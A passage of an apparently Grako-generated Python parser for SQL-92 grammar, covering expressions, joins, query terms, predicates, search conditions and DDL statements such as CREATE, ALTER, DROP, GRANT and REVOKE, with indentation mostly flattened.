self._else_clause_()
self._token('END')
@graken()
def _searched_case_(self):
self._token('CASE')
def block0():
self._searched_when_clause_()
self._positive_closure(block0)
with self._optional():
self._else_clause_()
self._token('END')
@graken()
def _simple_when_clause_(self):
self._token('WHEN')
self._value_expression_()
self._token('THEN')
self._result_()
@graken()
def _searched_when_clause_(self):
self._token('WHEN')
self._search_condition_()
self._token('THEN')
self._result_()
@graken()
def _else_clause_(self):
self._token('ELSE')
self._result_()
@graken()
def _result_(self):
with self._choice():
with self._option():
self._value_expression_()
with self._option():
self._token('NULL')
self._error('expecting one of: NULL')
@graken()
def _cast_specification_(self):
self._token('CAST')
self._left_paren_()
self._cast_operand_()
self._token('AS')
self._cast_target_()
self._right_paren_()
@graken()
def _cast_operand_(self):
with self._choice():
with self._option():
self._value_expression_()
with self._option():
self._token('NULL')
self._error('expecting one of: NULL')
@graken()
def _cast_target_(self):
with self._choice():
with self._option():
self._schema_qualified_name_()
with self._option():
self._data_type_()
self._error('no available options')
@graken()
def _value_expression_(self):
with self._choice():
with self._option():
self._numeric_value_expression_()
with self._option():
self._string_value_expression_()
with self._option():
self._datetime_value_expression_()
with self._option():
self._interval_value_expression_()
self._error('no available options')
@graken()
def _value_expression_primary_(self):
with self._choice():
with self._option():
self._unsigned_value_specification_()
with self._option():
self._column_reference_()
with self._option():
self._set_function_specification_()
with self._option():
self._subquery_()
with self._option():
self._case_expression_()
with self._option():
self._left_paren_()
self._value_expression_()
self._right_paren_()
with self._option():
self._cast_specification_()
self._error('no available options')
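    # The arithmetic and concatenation rules below are left-recursive
    # (e.g. numeric_value_expression ::= term | numeric_value_expression
    # "+" term), mirroring the SQL-92 BNF directly; Grako's runtime
    # supports left recursion through memoization, so the rules need no
    # rewrite into an iterative form.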
@graken()
def _numeric_value_expression_(self):
with self._choice():
with self._option():
self._term_()
with self._option():
self._numeric_value_expression_()
self._plus_sign_()
self._term_()
with self._option():
self._numeric_value_expression_()
self._minus_sign_()
self._term_()
self._error('no available options')
@graken()
def _term_(self):
with self._choice():
with self._option():
self._factor_()
with self._option():
self._term_()
self._asterisk_()
self._factor_()
with self._option():
self._term_()
self._solidus_()
self._factor_()
self._error('no available options')
@graken()
def _factor_(self):
with self._optional():
self._sign_()
self._numeric_primary_()
@graken()
def _numeric_primary_(self):
with self._choice():
with self._option():
self._value_expression_primary_()
with self._option():
self._numeric_value_function_()
self._error('no available options')
@graken()
def _string_value_expression_(self):
with self._choice():
with self._option():
self._character_value_expression_()
with self._option():
self._bit_value_expression_()
self._error('no available options')
@graken()
def _character_value_expression_(self):
with self._choice():
with self._option():
self._concatenation_()
with self._option():
self._character_factor_()
self._error('no available options')
@graken()
def _concatenation_(self):
self._character_value_expression_()
self._concatenation_operator_()
self._character_factor_()
@graken()
def _character_factor_(self):
self._character_primary_()
with self._optional():
self._collate_clause_()
@graken()
def _character_primary_(self):
with self._choice():
with self._option():
self._value_expression_primary_()
with self._option():
self._string_value_function_()
self._error('no available options')
@graken()
def _bit_value_expression_(self):
with self._choice():
with self._option():
self._bit_concatenation_()
with self._option():
self._bit_factor_()
self._error('no available options')
@graken()
def _bit_concatenation_(self):
self._bit_value_expression_()
self._concatenation_operator_()
self._bit_factor_()
@graken()
def _bit_factor_(self):
self._bit_primary_()
@graken()
def _bit_primary_(self):
with self._choice():
with self._option():
self._value_expression_primary_()
with self._option():
self._string_value_function_()
self._error('no available options')
@graken()
def _datetime_value_expression_(self):
with self._choice():
with self._option():
self._datetime_term_()
with self._option():
self._interval_value_expression_()
self._plus_sign_()
self._datetime_term_()
with self._option():
self._datetime_value_expression_()
self._plus_sign_()
self._interval_term_()
with self._option():
self._datetime_value_expression_()
self._minus_sign_()
self._interval_term_()
self._error('no available options')
@graken()
def _datetime_term_(self):
self._datetime_factor_()
@graken()
def _datetime_factor_(self):
self._datetime_primary_()
with self._optional():
self._time_zone_()
@graken()
def _datetime_primary_(self):
with self._choice():
with self._option():
self._value_expression_primary_()
with self._option():
self._datetime_value_function_()
self._error('no available options')
@graken()
def _time_zone_(self):
self._token('AT')
self._time_zone_specifier_()
@graken()
def _time_zone_specifier_(self):
with self._choice():
with self._option():
self._token('LOCAL')
with self._option():
self._token('TIME')
self._token('ZONE')
self._interval_value_expression_()
self._error('expecting one of: LOCAL')
@graken()
def _interval_value_expression_(self):
with self._choice():
with self._option():
self._interval_term_()
with self._option():
self._interval_value_expression_1_()
self._plus_sign_()
self._interval_term_1_()
with self._option():
self._interval_value_expression_1_()
self._minus_sign_()
self._interval_term_1_()
with self._option():
self._left_paren_()
self._datetime_value_expression_()
self._minus_sign_()
self._datetime_term_()
self._right_paren_()
self._interval_qualifier_()
self._error('no available options')
@graken()
def _interval_term_(self):
with self._choice():
with self._option():
self._interval_factor_()
with self._option():
self._interval_term_2_()
self._asterisk_()
self._factor_()
with self._option():
self._interval_term_2_()
self._solidus_()
self._factor_()
with self._option():
self._term_()
self._asterisk_()
self._interval_factor_()
self._error('no available options')
@graken()
def _interval_factor_(self):
with self._optional():
self._sign_()
self._interval_primary_()
@graken()
def _interval_primary_(self):
self._value_expression_primary_()
with self._optional():
self._interval_qualifier_()
@graken()
def _interval_value_expression_1_(self):
self._interval_value_expression_()
@graken()
def _interval_term_1_(self):
self._interval_term_()
@graken()
def _interval_term_2_(self):
self._interval_term_()
@graken()
def _row_value_constructor_(self):
with self._choice():
with self._option():
self._row_value_constructor_element_()
with self._option():
self._left_paren_()
self._row_value_constructor_list_()
self._right_paren_()
with self._option():
self._subquery_()
self._error('no available options')
@graken()
def _row_value_constructor_list_(self):
def sep0():
self._token(',')
def block0():
self._row_value_constructor_element_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _row_value_constructor_element_(self):
with self._choice():
with self._option():
self._value_expression_()
with self._option():
self._token('NULL')
with self._option():
self._token('DEFAULT')
self._error('expecting one of: DEFAULT NULL')
@graken()
def _table_value_constructor_(self):
self._token('VALUES')
self._table_value_constructor_list_()
@graken()
def _table_value_constructor_list_(self):
def sep0():
self._token(',')
def block0():
self._row_value_constructor_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _table_expression_(self):
self._from_clause_()
with self._optional():
self._where_clause_()
with self._optional():
self._group_by_clause_()
with self._optional():
self._having_clause_()
@graken()
def _from_clause_(self):
self._token('FROM')
def sep0():
self._token(',')
def block0():
self._table_reference_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _joined_table_(self):
with self._choice():
with self._option():
self._cross_join_()
with self._option():
self._qualified_join_()
with self._option():
self._left_paren_()
self._joined_table_()
self._right_paren_()
self._error('no available options')
@graken()
def _cross_join_(self):
self._table_reference_()
self._token('CROSS')
self._token('JOIN')
self._table_reference_()
@graken()
def _qualified_join_(self):
self._table_reference_()
with self._optional():
self._token('NATURAL')
with self._optional():
self._join_type_()
self._token('JOIN')
self._table_reference_()
with self._optional():
self._join_specification_()
@graken()
def _join_specification_(self):
with self._choice():
with self._option():
self._join_condition_()
with self._option():
self._named_columns_join_()
self._error('no available options')
@graken()
def _join_condition_(self):
self._token('ON')
self._search_condition_()
@graken()
def _named_columns_join_(self):
self._token('USING')
self._left_paren_()
self._column_name_list_()
self._right_paren_()
@graken()
def _join_type_(self):
with self._choice():
with self._option():
self._token('INNER')
with self._option():
self._outer_join_type_()
with self._optional():
self._token('OUTER')
with self._option():
self._token('UNION')
self._error('expecting one of: INNER UNION')
@graken()
def _outer_join_type_(self):
with self._choice():
with self._option():
self._token('LEFT')
with self._option():
self._token('RIGHT')
with self._option():
self._token('FULL')
self._error('expecting one of: FULL LEFT RIGHT')
@graken()
def _where_clause_(self):
self._token('WHERE')
self._search_condition_()
@graken()
def _group_by_clause_(self):
self._token('GROUP')
self._token('BY')
self._grouping_column_reference_list_()
@graken()
def _grouping_column_reference_list_(self):
def sep0():
self._token(',')
def block0():
self._grouping_column_reference_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _grouping_column_reference_(self):
self._column_reference_()
with self._optional():
self._collate_clause_()
@graken()
def _having_clause_(self):
self._token('HAVING')
self._search_condition_()
@graken()
def _query_specification_(self):
self._token('SELECT')
with self._optional():
self._set_quantifier_()
self._select_list_()
self._table_expression_()
@graken()
def _select_list_(self):
with self._choice():
with self._option():
self._asterisk_()
with self._option():
def sep0():
self._token(',')
def block0():
self._select_sublist_()
self._positive_closure(block0, prefix=sep0)
self._error('no available options')
@graken()
def _select_sublist_(self):
with self._choice():
with self._option():
self._derived_column_()
with self._option():
self._qualifier_()
self._period_()
self._asterisk_()
self._error('no available options')
@graken()
def _derived_column_(self):
self._value_expression_()
with self._optional():
self._as_clause_()
@graken()
def _as_clause_(self):
with self._optional():
self._token('AS')
self._identifier_()
@graken()
def _query_expression_(self):
with self._choice():
with self._option():
self._non_join_query_expression_()
with self._option():
self._joined_table_()
self._error('no available options')
@graken()
def _non_join_query_expression_(self):
with self._choice():
with self._option():
self._non_join_query_term_()
with self._option():
self._query_expression_()
self._token('UNION')
with self._optional():
self._token('ALL')
with self._optional():
self._corresponding_spec_()
self._query_term_()
with self._option():
self._query_expression_()
self._token('EXCEPT')
with self._optional():
self._token('ALL')
with self._optional():
self._corresponding_spec_()
self._query_term_()
self._error('no available options')
@graken()
def _query_term_(self):
with self._choice():
with self._option():
self._non_join_query_term_()
with self._option():
self._joined_table_()
self._error('no available options')
@graken()
def _non_join_query_term_(self):
with self._choice():
with self._option():
self._non_join_query_primary_()
with self._option():
self._query_term_()
self._token('INTERSECT')
with self._optional():
self._token('ALL')
with self._optional():
self._corresponding_spec_()
self._query_primary_()
self._error('no available options')
@graken()
def _query_primary_(self):
with self._choice():
with self._option():
self._non_join_query_primary_()
with self._option():
self._joined_table_()
self._error('no available options')
@graken()
def _non_join_query_primary_(self):
with self._choice():
with self._option():
self._simple_table_()
with self._option():
self._left_paren_()
self._non_join_query_expression_()
self._right_paren_()
self._error('no available options')
@graken()
def _simple_table_(self):
with self._choice():
with self._option():
self._query_specification_()
with self._option():
self._table_value_constructor_()
with self._option():
self._explicit_table_()
self._error('no available options')
@graken()
def _explicit_table_(self):
self._token('TABLE')
self._table_name_()
@graken()
def _corresponding_spec_(self):
self._token('CORRESPONDING')
with self._optional():
self._token('BY')
self._left_paren_()
self._column_name_list_()
self._right_paren_()
@graken()
def _subquery_(self):
self._left_paren_()
self._query_expression_()
self._right_paren_()
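    # Predicate productions: the building blocks of WHERE, HAVING, ON and
    # CHECK search conditions.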
@graken()
def _predicate_(self):
with self._choice():
with self._option():
self._comparison_predicate_()
with self._option():
self._between_predicate_()
with self._option():
self._in_predicate_()
with self._option():
self._like_predicate_()
with self._option():
self._null_predicate_()
with self._option():
self._quantified_comparison_predicate_()
with self._option():
self._exists_predicate_()
with self._option():
self._unique_predicate_()
with self._option():
self._match_predicate_()
with self._option():
self._overlaps_predicate_()
self._error('no available options')
@graken()
def _comparison_predicate_(self):
self._row_value_constructor_()
self._comp_op_()
self._row_value_constructor_()
@graken()
def _comp_op_(self):
with self._choice():
with self._option():
self._equals_operator_()
with self._option():
self._not_equals_operator_()
with self._option():
self._less_than_operator_()
with self._option():
self._greater_than_operator_()
with self._option():
self._less_than_or_equals_operator_()
with self._option():
self._greater_than_or_equals_operator_()
self._error('no available options')
@graken()
def _between_predicate_(self):
self._row_value_constructor_()
with self._optional():
self._token('NOT')
self._token('BETWEEN')
self._row_value_constructor_()
self._token('AND')
self._row_value_constructor_()
@graken()
def _in_predicate_(self):
self._row_value_constructor_()
with self._optional():
self._token('NOT')
self._token('IN')
self._in_predicate_value_()
@graken()
def _in_predicate_value_(self):
with self._choice():
with self._option():
self._subquery_()
with self._option():
self._left_paren_()
self._in_value_list_()
self._right_paren_()
self._error('no available options')
@graken()
def _in_value_list_(self):
self._value_expression_()
def block0():
self._comma_()
self._value_expression_()
self._positive_closure(block0)
@graken()
def _like_predicate_(self):
self._character_value_expression_()
with self._optional():
self._token('NOT')
self._token('LIKE')
self._character_value_expression_()
with self._optional():
self._token('ESCAPE')
self._character_value_expression_()
@graken()
def _null_predicate_(self):
self._row_value_constructor_()
self._token('IS')
with self._optional():
self._token('NOT')
self._token('NULL')
@graken()
def _quantified_comparison_predicate_(self):
self._row_value_constructor_()
self._comp_op_()
self._quantifier_()
self._subquery_()
@graken()
def _quantifier_(self):
with self._choice():
with self._option():
self._token('ALL')
with self._option():
self._some_()
self._error('expecting one of: ALL')
@graken()
def _some_(self):
with self._choice():
with self._option():
self._token('SOME')
with self._option():
self._token('ANY')
self._error('expecting one of: ANY SOME')
@graken()
def _exists_predicate_(self):
self._token('EXISTS')
self._subquery_()
@graken()
def _unique_predicate_(self):
self._token('UNIQUE')
self._subquery_()
@graken()
def _match_predicate_(self):
self._row_value_constructor_()
self._token('MATCH')
with self._optional():
self._token('UNIQUE')
with self._optional():
with self._choice():
with self._option():
self._token('PARTIAL')
with self._option():
self._token('FULL')
self._error('expecting one of: FULL PARTIAL')
self._subquery_()
@graken()
def _overlaps_predicate_(self):
self._row_value_constructor_()
self._token('OVERLAPS')
self._row_value_constructor_()
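    # Boolean combinators for search conditions: OR at the expression
    # level, AND at the term level, NOT at the factor level, plus the
    # IS [NOT] TRUE/FALSE/UNKNOWN test; operator precedence falls out of
    # the rule layering.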
@graken()
def _search_condition_(self):
with self._choice():
with self._option():
self._boolean_term_()
with self._option():
self._search_condition_()
self._token('OR')
self._boolean_term_()
self._error('no available options')
@graken()
def _boolean_term_(self):
with self._choice():
with self._option():
self._boolean_factor_()
with self._option():
self._boolean_term_()
self._token('AND')
self._boolean_factor_()
self._error('no available options')
@graken()
def _boolean_factor_(self):
with self._optional():
self._token('NOT')
self._boolean_test_()
@graken()
def _boolean_test_(self):
self._boolean_primary_()
with self._optional():
self._token('IS')
with self._optional():
self._token('NOT')
self._truth_value_()
@graken()
def _truth_value_(self):
with self._choice():
with self._option():
self._token('TRUE')
with self._option():
self._token('FALSE')
with self._option():
self._token('UNKNOWN')
self._error('expecting one of: FALSE TRUE UNKNOWN')
@graken()
def _boolean_primary_(self):
with self._choice():
with self._option():
self._predicate_()
with self._option():
self._left_paren_()
self._search_condition_()
self._right_paren_()
self._error('no available options')
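    # Interval qualifiers (e.g. DAY TO SECOND, or a single field such as
    # YEAR(2)), shared by interval data types and interval expressions.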
@graken()
def _interval_qualifier_(self):
with self._choice():
with self._option():
self._start_field_()
self._token('TO')
self._end_field_()
with self._option():
self._single_datetime_field_()
self._error('no available options')
@graken()
def _start_field_(self):
self._non_second_datetime_field_()
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
@graken()
def _end_field_(self):
with self._choice():
with self._option():
self._non_second_datetime_field_()
with self._option():
self._token('SECOND')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
self._error('expecting one of: SECOND')
@graken()
def _single_datetime_field_(self):
with self._choice():
with self._option():
self._non_second_datetime_field_()
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
with self._option():
self._token('SECOND')
with self._optional():
self._left_paren_()
self._precision_()
with self._optional():
self._comma_()
self._precision_()
self._right_paren_()
self._error('expecting one of: SECOND')
@graken()
def _datetime_field_(self):
with self._choice():
with self._option():
self._non_second_datetime_field_()
with self._option():
self._token('SECOND')
self._error('expecting one of: SECOND')
@graken()
def _non_second_datetime_field_(self):
with self._choice():
with self._option():
self._token('YEAR')
with self._option():
self._token('MONTH')
with self._option():
self._token('DAY')
with self._option():
self._token('HOUR')
with self._option():
self._token('MINUTE')
self._error('expecting one of: DAY HOUR MINUTE MONTH YEAR')
@graken()
def _privileges_(self):
with self._choice():
with self._option():
self._token('ALL')
self._token('PRIVILEGES')
with self._option():
self._action_list_()
self._error('expecting one of: ALL')
@graken()
def _action_list_(self):
def sep0():
self._token(',')
def block0():
self._action_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _action_(self):
with self._choice():
with self._option():
self._token('SELECT')
with self._option():
self._token('DELETE')
with self._option():
self._token('INSERT')
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
with self._option():
self._token('UPDATE')
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
with self._option():
self._token('REFERENCES')
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
with self._option():
self._token('USAGE')
self._error('expecting one of: DELETE INSERT REFERENCES SELECT UPDATE USAGE')
@graken()
def _grantee_(self):
with self._choice():
with self._option():
self._token('PUBLIC')
with self._option():
self._identifier_()
self._error('expecting one of: PUBLIC')
@graken()
def _collate_clause_(self):
self._token('COLLATE')
self._schema_qualified_name_()
@graken()
def _constraint_name_definition_(self):
self._token('CONSTRAINT')
self._schema_qualified_name_()
@graken()
def _constraint_attributes_(self):
with self._choice():
with self._option():
self._constraint_check_time_()
with self._optional():
with self._optional():
self._token('NOT')
self._token('DEFERRABLE')
with self._option():
with self._optional():
self._token('NOT')
self._token('DEFERRABLE')
with self._optional():
self._constraint_check_time_()
self._error('expecting one of: DEFERRABLE NOT')
@graken()
def _constraint_check_time_(self):
with self._choice():
with self._option():
self._token('INITIALLY')
self._token('DEFERRED')
with self._option():
self._token('INITIALLY')
self._token('IMMEDIATE')
self._error('expecting one of: INITIALLY')
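    # Schema definition and manipulation (DDL): CREATE/ALTER/DROP for
    # schemas, tables, views, domains, character sets, collations,
    # translations and assertions, plus GRANT/REVOKE privileges.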
@graken()
def _schema_definition_(self):
self._token('CREATE')
self._token('SCHEMA')
self._schema_name_clause_()
with self._optional():
self._schema_character_set_specification_()
with self._optional():
def block0():
self._schema_element_()
self._positive_closure(block0)
@graken()
def _schema_name_clause_(self):
with self._choice():
with self._option():
self._schema_name_()
with self._option():
self._token('AUTHORIZATION')
self._identifier_()
with self._option():
self._schema_name_()
self._token('AUTHORIZATION')
self._identifier_()
self._error('no available options')
@graken()
def _schema_character_set_specification_(self):
self._token('DEFAULT')
self._token('CHARACTER')
self._token('SET')
self._character_set_name_()
@graken()
def _schema_element_(self):
with self._choice():
with self._option():
self._domain_definition_()
with self._option():
self._table_definition_()
with self._option():
self._view_definition_()
with self._option():
self._grant_statement_()
with self._option():
self._assertion_definition_()
with self._option():
self._character_set_definition_()
with self._option():
self._collation_definition_()
with self._option():
self._translation_definition_()
self._error('no available options')
@graken()
def _drop_schema_statement_(self):
self._token('DROP')
self._token('SCHEMA')
self._schema_name_()
self._drop_behavior_()
@graken()
def _drop_behavior_(self):
with self._choice():
with self._option():
self._token('CASCADE')
with self._option():
self._token('RESTRICT')
self._error('expecting one of: CASCADE RESTRICT')
@graken()
def _table_definition_(self):
self._token('CREATE')
with self._optional():
with self._group():
with self._choice():
with self._option():
self._token('GLOBAL')
with self._option():
self._token('LOCAL')
self._error('expecting one of: GLOBAL LOCAL')
self._token('TEMPORARY')
self._token('TABLE')
self._table_name_()
self._table_element_list_()
with self._optional():
self._token('ON')
self._token('COMMIT')
with self._group():
with self._choice():
with self._option():
self._token('DELETE')
with self._option():
self._token('PRESERVE')
self._error('expecting one of: DELETE PRESERVE')
self._token('ROWS')
@graken()
def _table_element_list_(self):
self._left_paren_()
def sep0():
self._token(',')
def block0():
self._table_element_()
self._positive_closure(block0, prefix=sep0)
self._right_paren_()
@graken()
def _table_element_(self):
with self._choice():
with self._option():
self._column_definition_()
with self._option():
self._table_constraint_definition_()
self._error('no available options')
@graken()
def _column_definition_(self):
self._identifier_()
with self._group():
with self._choice():
with self._option():
self._data_type_()
with self._option():
self._schema_qualified_name_()
self._error('no available options')
with self._optional():
self._default_clause_()
with self._optional():
def block1():
self._column_constraint_definition_()
self._positive_closure(block1)
with self._optional():
self._collate_clause_()
@graken()
def _column_constraint_definition_(self):
with self._optional():
self._constraint_name_definition_()
self._column_constraint_()
with self._optional():
self._constraint_attributes_()
@graken()
def _column_constraint_(self):
with self._choice():
with self._option():
self._token('NOT')
self._token('NULL')
with self._option():
self._unique_specification_()
with self._option():
self._references_specification_()
with self._option():
self._check_constraint_definition_()
self._error('expecting one of: NOT')
@graken()
def _default_clause_(self):
self._token('DEFAULT')
self._default_option_()
@graken()
def _default_option_(self):
with self._choice():
with self._option():
self._literal_()
with self._option():
self._datetime_value_function_()
with self._option():
self._token('USER')
with self._option():
self._token('CURRENT_USER')
with self._option():
self._token('SESSION_USER')
with self._option():
self._token('SYSTEM_USER')
with self._option():
self._token('NULL')
self._error('expecting one of: CURRENT_USER NULL SESSION_USER SYSTEM_USER USER')
@graken()
def _table_constraint_definition_(self):
with self._optional():
self._constraint_name_definition_()
self._table_constraint_()
with self._optional():
self._constraint_attributes_()
@graken()
def _table_constraint_(self):
with self._choice():
with self._option():
self._unique_constraint_definition_()
with self._option():
self._referential_constraint_definition_()
with self._option():
self._check_constraint_definition_()
self._error('no available options')
@graken()
def _unique_constraint_definition_(self):
self._unique_specification_()
self._left_paren_()
self._column_name_list_()
self._right_paren_()
@graken()
def _unique_specification_(self):
with self._choice():
with self._option():
self._token('UNIQUE')
with self._option():
self._token('PRIMARY')
self._token('KEY')
self._error('expecting one of: PRIMARY UNIQUE')
@graken()
def _referential_constraint_definition_(self):
self._token('FOREIGN')
self._token('KEY')
self._left_paren_()
self._column_name_list_()
self._right_paren_()
self._references_specification_()
@graken()
def _references_specification_(self):
self._token('REFERENCES')
self._referenced_table_and_columns_()
with self._optional():
self._token('MATCH')
self._match_type_()
with self._optional():
self._referential_triggered_action_()
@graken()
def _match_type_(self):
with self._choice():
with self._option():
self._token('FULL')
with self._option():
self._token('PARTIAL')
self._error('expecting one of: FULL PARTIAL')
@graken()
def _referenced_table_and_columns_(self):
self._table_name_()
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
@graken()
def _referential_triggered_action_(self):
with self._choice():
with self._option():
self._update_rule_()
with self._optional():
self._delete_rule_()
with self._option():
self._delete_rule_()
with self._optional():
self._update_rule_()
self._error('no available options')
@graken()
def _update_rule_(self):
self._token('ON')
self._token('UPDATE')
self._referential_action_()
@graken()
def _delete_rule_(self):
self._token('ON')
self._token('DELETE')
self._referential_action_()
@graken()
def _referential_action_(self):
with self._choice():
with self._option():
self._token('CASCADE')
with self._option():
self._token('SET')
self._token('NULL')
with self._option():
self._token('SET')
self._token('DEFAULT')
with self._option():
self._token('NO')
self._token('ACTION')
self._error('expecting one of: CASCADE NO SET')
@graken()
def _check_constraint_definition_(self):
self._token('CHECK')
self._left_paren_()
self._search_condition_()
self._right_paren_()
@graken()
def _alter_table_statement_(self):
self._token('ALTER')
self._token('TABLE')
self._table_name_()
self._alter_table_action_()
@graken()
def _alter_table_action_(self):
with self._choice():
with self._option():
self._add_column_definition_()
with self._option():
self._alter_column_definition_()
with self._option():
self._drop_column_definition_()
with self._option():
self._add_table_constraint_definition_()
with self._option():
self._drop_table_constraint_definition_()
self._error('no available options')
@graken()
def _add_column_definition_(self):
self._token('ADD')
with self._optional():
self._token('COLUMN')
self._column_definition_()
@graken()
def _alter_column_definition_(self):
self._token('ALTER')
with self._optional():
self._token('COLUMN')
self._identifier_()
self._alter_column_action_()
@graken()
def _alter_column_action_(self):
with self._choice():
with self._option():
self._set_column_default_clause_()
with self._option():
self._drop_column_default_clause_()
self._error('no available options')
@graken()
def _set_column_default_clause_(self):
self._token('SET')
self._default_clause_()
@graken()
def _drop_column_default_clause_(self):
self._token('DROP')
self._token('DEFAULT')
@graken()
def _drop_column_definition_(self):
self._token('DROP')
with self._optional():
self._token('COLUMN')
self._identifier_()
self._drop_behavior_()
@graken()
def _add_table_constraint_definition_(self):
self._token('ADD')
self._table_constraint_definition_()
@graken()
def _drop_table_constraint_definition_(self):
self._token('DROP')
self._token('CONSTRAINT')
self._schema_qualified_name_()
self._drop_behavior_()
@graken()
def _drop_table_statement_(self):
self._token('DROP')
self._token('TABLE')
self._table_name_()
self._drop_behavior_()
@graken()
def _view_definition_(self):
self._token('CREATE')
self._token('VIEW')
self._table_name_()
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
self._token('AS')
self._query_expression_()
with self._optional():
self._token('WITH')
with self._optional():
self._levels_clause_()
self._token('CHECK')
self._token('OPTION')
@graken()
def _levels_clause_(self):
with self._choice():
with self._option():
self._token('CASCADED')
with self._option():
self._token('LOCAL')
self._error('expecting one of: CASCADED LOCAL')
@graken()
def _drop_view_statement_(self):
self._token('DROP')
self._token('VIEW')
self._table_name_()
self._drop_behavior_()
@graken()
def _domain_definition_(self):
self._token('CREATE')
self._token('DOMAIN')
self._schema_qualified_name_()
with self._optional():
self._token('AS')
self._data_type_()
with self._optional():
self._default_clause_()
with self._optional():
def block0():
self._domain_constraint_()
self._positive_closure(block0)
with self._optional():
self._collate_clause_()
@graken()
def _domain_constraint_(self):
with self._optional():
self._constraint_name_definition_()
self._check_constraint_definition_()
with self._optional():
self._constraint_attributes_()
@graken()
def _alter_domain_statement_(self):
self._token('ALTER')
self._token('DOMAIN')
self._schema_qualified_name_()
self._alter_domain_action_()
@graken()
def _alter_domain_action_(self):
with self._choice():
with self._option():
self._set_domain_default_clause_()
with self._option():
self._drop_domain_default_clause_()
with self._option():
self._add_domain_constraint_definition_()
with self._option():
self._drop_domain_constraint_definition_()
self._error('no available options')
@graken()
def _set_domain_default_clause_(self):
self._token('SET')
self._default_clause_()
@graken()
def _drop_domain_default_clause_(self):
self._token('DROP')
self._token('DEFAULT')
@graken()
def _add_domain_constraint_definition_(self):
self._token('ADD')
self._domain_constraint_()
@graken()
def _drop_domain_constraint_definition_(self):
self._token('DROP')
self._token('CONSTRAINT')
self._schema_qualified_name_()
@graken()
def _drop_domain_statement_(self):
self._token('DROP')
self._token('DOMAIN')
self._schema_qualified_name_()
self._drop_behavior_()
@graken()
def _character_set_definition_(self):
self._token('CREATE')
self._token('CHARACTER')
self._token('SET')
self._character_set_name_()
with self._optional():
self._token('AS')
self._character_set_source_()
with self._optional():
with self._choice():
with self._option():
self._collate_clause_()
with self._option():
self._limited_collation_definition_()
self._error('no available options')
@graken()
def _character_set_source_(self):
self._token('GET')
self._character_set_name_()
@graken()
def _limited_collation_definition_(self):
self._token('COLLATION')
self._token('FROM')
self._collation_source_()
@graken()
def _drop_character_set_statement_(self):
self._token('DROP')
self._token('CHARACTER')
self._token('SET')
self._character_set_name_()
@graken()
def _collation_definition_(self):
self._token('CREATE')
self._token('COLLATION')
self._schema_qualified_name_()
self._token('FOR')
self._character_set_name_()
self._token('FROM')
self._collation_source_()
with self._optional():
self._pad_attribute_()
@graken()
def _pad_attribute_(self):
with self._choice():
with self._option():
self._token('NO')
self._token('PAD')
with self._option():
self._token('PAD')
self._token('SPACE')
self._error('expecting one of: NO PAD')
@graken()
def _collation_source_(self):
with self._choice():
with self._option():
self._collating_sequence_definition_()
with self._option():
self._translation_collation_()
self._error('no available options')
@graken()
def _collating_sequence_definition_(self):
with self._choice():
with self._option():
self._external_collation_()
with self._option():
self._schema_qualified_name_()
with self._option():
self._token('DESC')
self._left_paren_()
self._schema_qualified_name_()
self._right_paren_()
with self._option():
self._token('DEFAULT')
self._error('expecting one of: DEFAULT')
@graken()
def _translation_collation_(self):
self._token('TRANSLATION')
self._schema_qualified_name_()
with self._optional():
self._token('THEN')
self._token('COLLATION')
self._schema_qualified_name_()
@graken()
def _external_collation_(self):
self._token('EXTERNAL')
self._left_paren_()
self._quote_()
self._schema_qualified_name_()
self._quote_()
self._right_paren_()
@graken()
def _drop_collation_statement_(self):
self._token('DROP')
self._token('COLLATION')
self._schema_qualified_name_()
@graken()
def _translation_definition_(self):
self._token('CREATE')
self._token('TRANSLATION')
self._schema_qualified_name_()
self._token('FOR')
self._character_set_name_()
self._token('TO')
self._character_set_name_()
self._token('FROM')
self._translation_specification_()
@graken()
def _translation_specification_(self):
with self._choice():
with self._option():
self._external_translation_()
with self._option():
self._token('IDENTITY')
with self._option():
self._schema_qualified_name_()
self._error('expecting one of: IDENTITY')
@graken()
def _external_translation_(self):
self._token('EXTERNAL')
self._left_paren_()
self._quote_()
self._schema_qualified_name_()
self._quote_()
self._right_paren_()
@graken()
def _drop_translation_statement_(self):
self._token('DROP')
self._token('TRANSLATION')
self._schema_qualified_name_()
@graken()
def _assertion_definition_(self):
self._token('CREATE')
self._token('ASSERTION')
self._schema_qualified_name_()
self._assertion_check_()
with self._optional():
self._constraint_attributes_()
@graken()
def _assertion_check_(self):
self._token('CHECK')
self._left_paren_()
self._search_condition_()
self._right_paren_()
@graken()
def _drop_assertion_statement_(self):
self._token('DROP')
self._token('ASSERTION')
self._schema_qualified_name_()
@graken()
def _grant_statement_(self):
self._token('GRANT')
self._privileges_()
self._token('ON')
self._object_name_()
self._token('TO')
def sep0():
self._token(',')
def block0():
self._grantee_()
self._positive_closure(block0, prefix=sep0)
with self._optional():
self._token('WITH')
self._token('GRANT')
self._token('OPTION')
@graken()
def _object_name_(self):
with self._choice():
with self._option():
with self._optional():
self._token('TABLE')
self._table_name_()
with self._option():
self._token('DOMAIN')
self._schema_qualified_name_()
with self._option():
self._token('COLLATION')
self._schema_qualified_name_()
with self._option():
self._token('CHARACTER')
self._token('SET')
self._character_set_name_()
with self._option():
self._token('TRANSLATION')
self._schema_qualified_name_()
self._error('no available options')
@graken()
def _revoke_statement_(self):
self._token('REVOKE')
with self._optional():
self._token('GRANT')
self._token('OPTION')
self._token('FOR')
self._privileges_()
self._token('ON')
self._object_name_()
self._token('FROM')
def sep0():
self._token(',')
def block0():
self._grantee_()
self._positive_closure(block0, prefix=sep0)
self._drop_behavior_()
@graken()
def _sql_schema_statement_(self):
with self._choice():
with self._option():
self._sql_schema_definition_statement_()
with self._option():
self._sql_schema_manipulation_statement_()
self._error('no available options')
@graken()
def _sql_schema_definition_statement_(self):
with self._choice():
with self._option():
self._schema_definition_()
with self._option():
self._table_definition_()
with self._option():
self._view_definition_()
with self._option():
self._grant_statement_()
with self._option():
self._domain_definition_()
with self._option():
self._character_set_definition_()
